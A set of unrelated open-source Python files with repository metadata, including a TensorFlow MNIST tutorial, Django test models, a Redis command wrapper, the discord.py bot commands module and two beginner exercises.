"id": "d816297a3d2952bbc5302a5fcf322605abc559d5",
"size": "3933",
"binary": false,
"copies": "1",
"ref": "refs/heads/release-0.6",
"path": "python/kfserving/kfserving/models/v1beta1_transformers_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "224"
},
{
"name": "Dockerfile",
"bytes": "10549"
},
{
"name": "Go",
"bytes": "1251102"
},
{
"name": "HTML",
"bytes": "17922"
},
{
"name": "JavaScript",
"bytes": "1828"
},
{
"name": "Jsonnet",
"bytes": "2434415"
},
{
"name": "Makefile",
"bytes": "16071"
},
{
"name": "Python",
"bytes": "1860674"
},
{
"name": "SCSS",
"bytes": "1789"
},
{
"name": "Shell",
"bytes": "36788"
},
{
"name": "TypeScript",
"bytes": "78886"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import argparse
import sys
import tempfile
from tensorflow.examples.tutorials.mnist import input_data
FLAGS = None
##
# @brief generate variables by given shape
#
# @param shape:weights shape
#
# @return weights
def weights_variables(shape):
weights = tf.Variable(tf.truncated_normal(
shape=shape, stddev=0.1))
return weights
##
# @brief return bais
#
# @param shape:bais shape
#
# @return bais
def basi_variables(shape):
bais = tf.Variable(tf.zeros(shape))
return bais
##
# @brief
#
# @param x: input image
# @param w: conv variables
#
# @return conv result tensor
def conv2d(x, w):
return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
##
# @brief pooling function
#
# @param x: input images
#
# @return: pooling result tensor
def max_pooling_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME')
##
# @brief build a deep network
#
# @param x: mnist input pixels
#
# @return
def deep_network(x):
with tf.name_scope('reshape'):
# reshape input x, first dim is -1, it means the first dim will be
# computed, last dim represent colorful image's channel
x_image = tf.reshape(x, [-1, 28, 28, 1])
# first conv operation
with tf.name_scope('conv1'):
W_conv1 = weights_variables([5, 5, 1, 32])
b_conv1 = basi_variables([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# pooling layer
with tf.name_scope('pooling1'):
h_pool1 = max_pooling_2x2(h_conv1)
# second conv operation
with tf.name_scope('conv2'):
W_conv2 = weights_variables([5, 5, 32, 64])
b_conv2 = basi_variables([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# pooling layer
with tf.name_scope('pooling2'):
h_pool2 = max_pooling_2x2(h_conv2)
# first full connect layer
with tf.name_scope('fc1'):
W_fc1 = weights_variables([7 * 7 * 64, 1024])
b_fc1 = basi_variables([1024])
h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# dropout
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# second full layer
with tf.name_scope('fc2'):
W_fc2 = weights_variables([1024, 10])
b_fc2 = basi_variables([10])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
##
# @brief main function
#
# @return
def main():
mnist = input_data.read_data_set(FLAGS.data_dir, one_hot=True)
x = tf.placeholder(tf.float32, [None, 784])
y_ = tf.placeholder(tf.float32, [None, 10])
y_conv, prob = deep_network(x)
with tf.name_scope('loss'):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_,
logits=y_conv)
cross_entropy = tf.reduce_mean(cross_entropy)
with tf.name_scope('adam_optimizer'):
train_step = tf.train.AdamOption(0.0001).minimize(cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
correct_prediction = tf.cast(correct_prediction, tf.float32)
accuracy = tf.reduce_mean(correct_prediction)
graph_location = tempfile.mkstemp()
print('saving graph %s' % graph_location)
train_writer = tf.summary.FileWriter(graph_location)
train_writer.add_graph(tf.get_default_graph())
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(20000):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x: batch[0],
y_: batch[1],
prob: 1.0})
print('step %d, training accuracy %g' % (i, train_accuracy))
train_step.run(feed_dict={x: batch[0],
y_: batch[1],
prob: 0.5})
print('test accuracy: %g' %
accuracy.eval(feed_dict={x: mnist.test.images,
y_: mnist.test.labels,
prob: 1.0}))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir',
type=str,
default='/home/viekie/mnist/input_data',
help='mnist data dir')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| {
"content_hash": "b186f3a91f96d5035f66874655ffd36a",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 78,
"avg_line_length": 31.529032258064515,
"alnum_prop": 0.570902394106814,
"repo_name": "viekie/tensorflow-tutorial",
"id": "b3fb1f4b198b8117f248eabe074de90c52ae6149",
"size": "5092",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "chap04/mnist_deep.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "140354"
}
],
"symlink_target": ""
} |
from django.db import models
from django_countries.fields import CountryField
from django_countries.tests import custom_countries
class Person(models.Model):
name = models.CharField(max_length=50)
country = CountryField()
other_country = CountryField(
blank=True, countries_flag_url="//flags.example.com/{code}.gif"
)
str_attr_country = CountryField(blank=True, countries_str_attr="name")
favourite_country = CountryField(default="NZ")
fantasy_country = CountryField(
countries=custom_countries.FantasyCountries, blank=True
)
class Meta:
ordering = ("name",)
class AllowNull(models.Model):
country = CountryField(null=True, blank=True, blank_label="(select country)")
class MultiCountry(models.Model):
countries = CountryField(multiple=True)
unsorted_countries = CountryField(multiple=True, multiple_sort=False, blank=True)
duplicate_countries = CountryField(multiple=True, multiple_unique=False, blank=True)
unsorted_duplicate_countries = CountryField(
multiple=True, multiple_sort=False, multiple_unique=False, blank=True
)
uneditable_countries = CountryField(multiple=True, editable=False)
class WithProp(models.Model):
country = CountryField()
_private_field = models.CharField(max_length=10)
@property
def public_field(self):
return self._private_field
@public_field.setter
def public_field(self, value):
self._private_field = value
| {
"content_hash": "0a1f9552f3cfc5376fdd6de743275a81",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 88,
"avg_line_length": 31.617021276595743,
"alnum_prop": 0.7166890982503364,
"repo_name": "SmileyChris/django-countries",
"id": "ca2dcabfaad0be3b058bdd98488d528d88fdd9bf",
"size": "1486",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_countries/tests/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11991"
},
{
"name": "Python",
"bytes": "141477"
}
],
"symlink_target": ""
} |
class CommandTrait(object):
def get_id(self):
pass
def set_hash(self):
pass
def get_hash(self):
pass
def set_arguments(self, arguments):
pass
def set_raw_arguments(self, arguments):
pass
def get_arguments(self):
pass
def get_argument(self, index):
pass
def parse_response(self, data):
pass
class AbstractCommand(CommandTrait):
def fitler_arguments(self, arguments):
return arguments
def set_arguments(self, arguments):
self.arguments = self.fitler_arguments(arguments)
def set_raw_arguments(self, arguments):
self.arguments = arguments
def get_arguments(self):
return self.arguments
def get_argument(self, index):
if index < len(self.arguments) - 1:
return self.arguments[index]
def get_hash(self):
if hasattr(self, 'hash'):
return self.hash
def parse_response(self, data):
return data
def to_string_argument_reducer(self, accumulator, argument):
if len(argument) > 32:
argument = argument[:32] + '[...]'
accumulator += ' ' + argument
return accumulator
def __str__(sekf):
return array_reduce(
self.get_arguments(),
self.to_string_argument_reducer,
self.get_id())
def normalize_variadic(self, arguments):
if len(arguments) == 2 and arguments[1]:
return arguments[0] + arguments[1]
return arguments
class ConnectionAuth(AbstractCommand):
def get_id(self):
return 'AUTH'
class ConnectionEcho(AbstractCommand):
def get_id(self):
return 'ECHO'
class ConnectionPing(AbstractCommand):
def get_id(self):
return 'PING'
def parse_response(self, data):
return data == 'PONG'
class ConnectionQuit(AbstractCommand):
def get_id(self):
return 'QUIT'
class ConnectionSelect(AbstractCommand):
def get_id(self):
return 'SELECT'
class HashDelete(AbstractCommand):
def get_id(self):
return 'HDEL'
def filer_arguments(self, arguments):
return self.normalize_variadic(arguments)
class HashExists(AbstractCommand):
def get_id(self):
return 'HEXISTS'
def parse_response(self, data):
return bool(data)
class HashGet(AbstractCommand):
def get_id(self):
return 'HGET'
class HashGetAll(AbstractCommand):
def get_id(self):
return 'HGETALL'
def parse_response(self, data):
i = 0
result = {}
for i in range(len(data), 2):
reseult[data[i]] = data[i + 1]
class HashGetMultiple(AbstractCommand):
def get_id(self):
return 'HMGET'
def filer_arguments(self, arguments):
return self.normalize_variadic(arguments)
class HashIncrementBy(AbstractCommand):
def get_id(self):
return 'HINCRBY'
class HashIncrementByFloat(AbstractCommand):
def get_id(self):
return 'HINCRBYFLAOT'
class StringGet(AbstractCommand):
def get_id(self):
return 'GET'
class StringSet(AbstractCommand):
def get_id(self):
return 'SET'
| {
"content_hash": "6281acaca8a286139482a872bab9a2a5",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 64,
"avg_line_length": 18.795321637426902,
"alnum_prop": 0.6120099564405725,
"repo_name": "whiteclover/redis-py",
"id": "b1bd0f730d4e05ad0fd7b0b674bf34fbe65ac8a0",
"size": "3214",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "redispy/command.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31224"
}
],
"symlink_target": ""
} |
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import discord
import inspect
import importlib
import sys
import traceback
import re
from .core import GroupMixin, Command, command
from .view import StringView
from .context import Context
from .errors import CommandNotFound, CommandError
from .formatter import HelpFormatter
def _get_variable(name):
stack = inspect.stack()
try:
for frames in stack:
try:
frame = frames[0]
current_locals = frame.f_locals
if name in current_locals:
return current_locals[name]
finally:
del frame
finally:
del stack
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent
to being mentioned, e.g. ``@bot ``."""
server = msg.server
if server is not None:
return '{0.me.mention} '.format(server)
return '{0.user.mention} '.format(bot)
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
Example
--------
.. code-block:: python
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
See Also
----------
:func:`when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r.append(when_mentioned(bot, msg))
return r
return inner
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
@asyncio.coroutine
def _default_help_command(ctx, *commands : str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.commands.get(name)
if command is None:
yield from bot.send_message(destination, bot.command_not_found.format(name))
return
pages = bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.commands.get(name)
if command is None:
yield from bot.send_message(destination, bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.commands.get(key)
if command is None:
yield from bot.send_message(destination, bot.command_not_found.format(key))
return
except AttributeError:
yield from bot.send_message(destination, bot.command_has_no_subcommands.format(command, key))
return
pages = bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(lambda l: len(l), pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
yield from bot.send_message(destination, page)
class Bot(GroupMixin, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
The command prefix could also be a list or a tuple indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`Context.prefix`.
description : str
The content prefixed into the default help message.
self_bot : bool
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
formatter : :class:`HelpFormatter`
The formatter used to format the help message. By default, it uses a
the :class:`HelpFormatter`. Check it for more info on how to override it.
If you want to change the help command completely (add aliases, etc) then
a call to :meth:`remove_command` with 'help' as the argument would do the
trick.
pm_help : Optional[bool]
A tribool that indicates if the help command should PM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is PM'd. If ``False``, none of the help
output is PM'd. If ``None``, then the bot will only PM when the help
message becomes too long (dictated by more than 1000 characters).
Defaults to ``False``.
help_attrs : dict
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`Command` constructor. Note that ``pass_context``
will always be set to ``True`` regardless of what you pass in.
command_not_found : str
The format string used when the help command is invoked with a command that
is not found. Useful for i18n. Defaults to ``"No command called {} found."``.
The only format argument is the name of the command passed.
command_has_no_subcommands : str
The format string used when the help command is invoked with requests for a
subcommand but the command does not have any subcommands. Defaults to
``"Command {0.name} has no subcommands."``. The first format argument is the
:class:`Command` attempted to get a subcommand and the second is the name.
"""
def __init__(self, command_prefix, formatter=None, description=None, pm_help=False, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.cogs = {}
self.extensions = {}
self._checks = []
self.description = inspect.cleandoc(description) if description else ''
self.pm_help = pm_help
self.command_not_found = options.pop('command_not_found', 'No command called "{}" found.')
self.command_has_no_subcommands = options.pop('command_has_no_subcommands', 'Command {0.name} has no subcommands.')
self._skip_check = discord.User.__ne__ if options.pop('self_bot', False) else discord.User.__eq__
self.help_attrs = options.pop('help_attrs', {})
self.help_attrs['pass_context'] = True
if 'name' not in self.help_attrs:
self.help_attrs['name'] = 'help'
if formatter is not None:
if not isinstance(formatter, HelpFormatter):
raise discord.ClientException('Formatter must be a subclass of HelpFormatter')
self.formatter = formatter
else:
self.formatter = HelpFormatter()
# pay no mind to this ugliness.
self.command(**self.help_attrs)(_default_help_command)
# internal helpers
@asyncio.coroutine
def _get_prefix(self, message):
prefix = self.command_prefix
if callable(prefix):
ret = prefix(self, message)
if asyncio.iscoroutine(ret):
ret = yield from ret
return ret
else:
return prefix
@asyncio.coroutine
def _run_extra(self, coro, event_name, *args, **kwargs):
try:
yield from coro(*args, **kwargs)
except asyncio.CancelledError:
pass
except Exception:
try:
yield from self.on_error(event_name, *args, **kwargs)
except asyncio.CancelledError:
pass
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
if ev in self.extra_events:
for event in self.extra_events[ev]:
coro = self._run_extra(event, event_name, *args, **kwargs)
discord.compat.create_task(coro, loop=self.loop)
@asyncio.coroutine
def close(self):
for extension in tuple(self.extensions):
try:
self.unload_extension(extension)
except:
pass
for cog in tuple(self.cogs):
try:
self.remove_cog(cog)
except:
pass
yield from super().close()
@asyncio.coroutine
def on_command_error(self, exception, context):
"""|coro|
The default command error handler provided by the bot.
By default this prints to ``sys.stderr`` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
if hasattr(context.command, "on_error"):
return
print('Ignoring exception in command {}'.format(context.command), file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# utility "send_*" functions
@asyncio.coroutine
def _augmented_msg(self, coro, **kwargs):
msg = yield from coro
delete_after = kwargs.get('delete_after')
if delete_after is not None:
@asyncio.coroutine
def delete():
yield from asyncio.sleep(delete_after, loop=self.loop)
yield from self.delete_message(msg)
discord.compat.create_task(delete(), loop=self.loop)
return msg
def say(self, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_message(message.channel, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_message`
"""
destination = _get_variable('_internal_channel')
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_message(destination, *args, **kwargs)
return self._augmented_msg(coro, **params)
def whisper(self, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_message(message.author, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_message`
"""
destination = _get_variable('_internal_author')
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_message(destination, *args, **kwargs)
return self._augmented_msg(coro, **params)
def reply(self, content, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
msg = '{0.mention}, {1}'.format(message.author, content)
self.send_message(message.channel, msg, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_message`
"""
author = _get_variable('_internal_author')
destination = _get_variable('_internal_channel')
fmt = '{0.mention}, {1}'.format(author, str(content))
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_message(destination, fmt, *args, **kwargs)
return self._augmented_msg(coro, **params)
def upload(self, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_file(message.channel, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_file`
"""
destination = _get_variable('_internal_channel')
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_file(destination, *args, **kwargs)
return self._augmented_msg(coro, **params)
def type(self):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_typing(message.channel)
See Also
---------
The :meth:`Client.send_typing` function.
"""
destination = _get_variable('_internal_channel')
return self.send_typing(destination)
# global check registration
def check(self, func):
"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. warning::
This function must be a *regular* function and not a coroutine.
Similar to a command :func:`check`\, this takes a single parameter
of type :class:`Context` and can only raise exceptions derived from
:exc:`CommandError`.
Example
---------
.. code-block:: python
@bot.check
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func)
return func
def add_check(self, func):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`check`.
Parameters
-----------
func
The function that was used as a global check.
"""
self._checks.append(func)
def remove_check(self, func):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
"""
try:
self._checks.remove(func)
except ValueError:
pass
def can_run(self, ctx):
return all(f(ctx) for f in self._checks)
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`listen`.
Parameters
-----------
func : coroutine
The extra event to listen to.
name : Optional[str]
The name of the command to use. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise discord.ClientException('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`discord.on_ready`
The functions being listened to must be a coroutine.
Example
--------
.. code-block:: python
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
discord.ClientException
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog):
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
They are meant as a way to organize multiple relevant commands
into a singular class that shares some state or no state at all.
The cog can also have a ``__check`` member function that allows
you to define a global check. See :meth:`check` for more info.
More information will be documented soon.
Parameters
-----------
cog
The cog to register to the bot.
"""
self.cogs[type(cog).__name__] = cog
try:
check = getattr(cog, '_{.__class__.__name__}__check'.format(cog))
except AttributeError:
pass
else:
self.add_check(check)
members = inspect.getmembers(cog)
for name, member in members:
# register commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.add_command(member)
continue
# register event listeners the cog has
if name.startswith('on_'):
self.add_listener(member)
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name : str
The name of the cog you are requesting.
"""
return self.cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then ``None`` is returned, otherwise
the cog instance that is being removed is returned.
If the cog defines a special member function named ``__unload``
then it is called when removal has completed. This function
**cannot** be a coroutine. It must be a regular function.
Parameters
-----------
name : str
The name of the cog to remove.
"""
cog = self.cogs.pop(name, None)
if cog is None:
return cog
members = inspect.getmembers(cog)
for name, member in members:
# remove commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.remove_command(member.name)
continue
# remove event listeners the cog has
if name.startswith('on_'):
self.remove_listener(member)
try:
check = getattr(cog, '_{0.__class__.__name__}__check'.format(cog))
except AttributeError:
pass
else:
self.remove_check(check)
unloader_name = '_{0.__class__.__name__}__unload'.format(cog)
try:
unloader = getattr(cog, unloader_name)
except AttributeError:
pass
else:
unloader()
del cog
# extensions
def load_extension(self, name):
if name in self.extensions:
return
lib = importlib.import_module(name)
if not hasattr(lib, 'setup'):
del lib
del sys.modules[name]
raise discord.ClientException('extension does not have a setup function')
lib.setup(self)
self.extensions[name] = lib
def unload_extension(self, name):
lib = self.extensions.get(name)
if lib is None:
return
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.cogs.copy().items():
if inspect.getmodule(cog) is lib:
self.remove_cog(cogname)
# first remove all the commands from the module
for command in self.commands.copy().values():
if command.module is lib:
command.module = None
if isinstance(command, GroupMixin):
command.recursively_remove_all_commands()
self.remove_command(command.name)
# then remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if inspect.getmodule(event) is lib:
remove.append(index)
for index in reversed(remove):
del event_list[index]
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except:
pass
finally:
# finally remove the import..
del lib
del self.extensions[name]
del sys.modules[name]
# command processing
@asyncio.coroutine
def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`on_message`
event. If you choose to override the :func:`on_message` event, then
you should invoke this coroutine as well.
Warning
--------
This function is necessary for :meth:`say`, :meth:`whisper`,
:meth:`type`, :meth:`reply`, and :meth:`upload` to work due to the
way they are written. It is also required for the :func:`on_command`
and :func:`on_command_completion` events.
Parameters
-----------
message : discord.Message
The message to process commands for.
"""
_internal_channel = message.channel
_internal_author = message.author
view = StringView(message.content)
if self._skip_check(message.author, self.user):
return
prefix = yield from self._get_prefix(message)
invoked_prefix = prefix
if not isinstance(prefix, (tuple, list)):
if not view.skip_string(prefix):
return
else:
invoked_prefix = discord.utils.find(view.skip_string, prefix)
if invoked_prefix is None:
return
invoker = view.get_word()
tmp = {
'bot': self,
'invoked_with': invoker,
'message': message,
'view': view,
'prefix': invoked_prefix
}
ctx = Context(**tmp)
del tmp
if invoker in self.commands:
command = self.commands[invoker]
self.dispatch('command', command, ctx)
try:
yield from command.invoke(ctx)
except CommandError as e:
ctx.command.dispatch_error(e, ctx)
else:
self.dispatch('command_completion', command, ctx)
elif invoker:
exc = CommandNotFound('Command "{}" is not found'.format(invoker))
self.dispatch('command_error', exc, ctx)
@asyncio.coroutine
def on_message(self, message):
yield from self.process_commands(message)
| {
"content_hash": "eac1d493742ea6e9b00f942fe8c751b5",
"timestamp": "",
"source": "github",
"line_count": 855,
"max_line_length": 123,
"avg_line_length": 32.02807017543859,
"alnum_prop": 0.5878250073035349,
"repo_name": "OthmanEmpire/project_othbot",
"id": "03bbd1cb791d85cb052002127f6baedbffb36e52",
"size": "27409",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "discord/ext/commands/bot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "474615"
}
],
"symlink_target": ""
} |
fname = input('Enter the file name: ')
try:
fhand = open(fname)
except:
print('File cannot be opened:', fname)
exit()
count = 0
for line in fhand:
if line.startswith('Subject:') :
count = count + 1
print('There were', count, 'subject lines in', fname)
| {
"content_hash": "a56498656f41f0ded7a698b1d62f6d64",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 53,
"avg_line_length": 25.181818181818183,
"alnum_prop": 0.6245487364620939,
"repo_name": "mkhuthir/learnPython",
"id": "1feac51ee31fe299ef9b4ea584418d3ab3ad384e",
"size": "277",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Book_pythonlearn_com/02_strings/search7.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7706"
}
],
"symlink_target": ""
} |
import numpy
from pandas import DataFrame, Series
def a_dot():
'''
Imagine a point system in which each country is awarded 4 points for each
gold medal, 2 points for each silver medal, and one point for each
bronze medal.
Using the numpy.dot function, create a new dataframe called
'olympic_points_df' that includes:
a) a column called 'country_name' with the country name
b) a column called 'points' with the total number of points the country
earned at the Sochi olympics.
You do not need to call the function in your code when running it in the
browser - the grader will do that automatically when you submit or test it.
'''
countries = ['Russian Fed.', 'Norway', 'Canada', 'United States',
'Netherlands', 'Germany', 'Switzerland', 'Belarus',
'Austria', 'France', 'Poland', 'China', 'Korea',
'Sweden', 'Czech Republic', 'Slovenia', 'Japan',
'Finland', 'Great Britain', 'Ukraine', 'Slovakia',
'Italy', 'Latvia', 'Australia', 'Croatia', 'Kazakhstan']
gold = [13, 11, 10, 9, 8, 8, 6, 5, 4, 4, 4, 3, 3, 2, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
silver = [11, 5, 10, 7, 7, 6, 3, 0, 8, 4, 1, 4, 3, 7, 4, 2, 4, 3, 1, 0, 0, 2, 2, 2, 1, 0]
bronze = [9, 10, 5, 12, 9, 5, 2, 1, 5, 7, 1, 2, 2, 6, 2, 4, 3, 1, 2, 1, 0, 6, 2, 1, 0, 1]
# YOUR CODE HERE
olympic_medal_counts = {'country_name': countries,
'gold': Series(gold),
'silver': Series(silver),
'bronze': Series(bronze)}
df = DataFrame(olympic_medal_counts)
olympic_points_df = df[['country_name','gold','silver','bronze']].apply(lambda x: [x['country_name'],x['gold']*4,x['silver']*2,x['bronze']*1], axis=1 )
olympic_points_df['points'] = olympic_points_df['gold'] + olympic_points_df['silver'] + olympic_points_df['bronze']
return olympic_points_df[['country_name','points']]
def numpy_dot():
'''
Imagine a point system in which each country is awarded 4 points for each
gold medal, 2 points for each silver medal, and one point for each
bronze medal.
Using the numpy.dot function, create a new dataframe called
'olympic_points_df' that includes:
a) a column called 'country_name' with the country name
b) a column called 'points' with the total number of points the country
earned at the Sochi olympics.
You do not need to call the function in your code when running it in the
browser - the grader will do that automatically when you submit or test it.
'''
countries = ['Russian Fed.', 'Norway', 'Canada', 'United States',
'Netherlands', 'Germany', 'Switzerland', 'Belarus',
'Austria', 'France', 'Poland', 'China', 'Korea',
'Sweden', 'Czech Republic', 'Slovenia', 'Japan',
'Finland', 'Great Britain', 'Ukraine', 'Slovakia',
'Italy', 'Latvia', 'Australia', 'Croatia', 'Kazakhstan']
